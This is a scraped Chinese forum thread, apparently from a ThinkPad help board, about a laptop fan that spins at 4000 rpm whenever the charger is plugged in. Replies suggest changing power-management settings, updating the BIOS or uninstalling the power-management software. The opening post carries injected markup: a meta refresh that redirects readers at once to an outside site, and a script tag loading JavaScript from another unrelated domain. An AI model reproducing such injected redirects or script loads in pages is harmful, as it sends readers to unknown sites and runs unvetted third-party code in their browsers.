开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

插电源风扇转速变快?

用电视的时候风扇转速正常,只要插上电源风扇转速立马变成4000转,并且非常响?什么问题?
<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

插电源

插电源

电池

电池
yuxyxx 发表于 2012-3-29 16:13
那是因为开到最高性能了~

我在电池管理改成最低了 风扇依然响个不停。
电源模式下性能更强,好热更大,转速也会更高。
转就转呗
转转更健康~~   用电源  各种隐藏BOSS 都出来了~~体力战
隐藏关卡,需要跟多的血瓶,和魔瓶,这个你懂的呀!
4000转啊..很正常, 我的也4000多转...
什么型号啊??
这个算有问题吧??
不对吧,大哥们,我什么都不运行,只要插上电源一开机就一直很响..这个难道不是问题?
yaofaye 发表于 2012-3-30 09:36
不对吧,大哥们,我什么都不运行,只要插上电源一开机就一直很响..这个难道不是问题? ...

你可以设置下电源管理,默认的插上电源性能最高,性能最高,风扇转速也会较高。
EddieFan 发表于 2012-3-30 09:48
你可以设置下电源管理,默认的插上电源性能最高,性能最高,风扇转速也会较高。
...

不行。我怀疑是电源适配器的问题,我现在只能用电池了,插上电源实在是太响了。
yaofaye 发表于 2012-3-30 11:01
不行。我怀疑是电源适配器的问题,我现在只能用电池了,插上电源实在是太响了。 ...

有没有靠近听一下是什么地方响,如果是风扇,就升级bios吧。见过一个案例,开机风扇就一直4000多转,升级了bios后转速能够智能调节了。
ibrave 发表于 2012-3-30 11:04
有没有靠近听一下是什么地方响,如果是风扇,就升级bios吧。见过一个案例,开机风扇就一直4000多转,升级 ...

非常响。。。一直保持在4000转以上,而且机器温度都是正常的。如何升级BIOS?
不行,一直保持在4000转以上。。非常响。。愁人 啊。
风扇响还是电源响啊
这样散热好
babeltree 发表于 2012-3-30 20:13
这样散热好

呵呵 散热是好了,但是我觉得这样不对啊。应该比较智能才对吧。没热量也转的很快。。唉。。
话说俺的声音也很大,但是俺随便它了。。。。。。。
lorelei 发表于 2012-4-3 16:05
话说俺的声音也很大,但是俺随便它了。。。。。。。

温度高么?
不高,当然放棉被上肯定高。。。。。。。。

我重装过系统了  发表于 2012-4-4 09:37
卸载电源管理pm试试,有可能能解决问题,同时还能降低温度
花生 发表于 2012-4-4 12:08
卸载电源管理pm试试,有可能能解决问题,同时还能降低温度

我试试看
电源管理的作用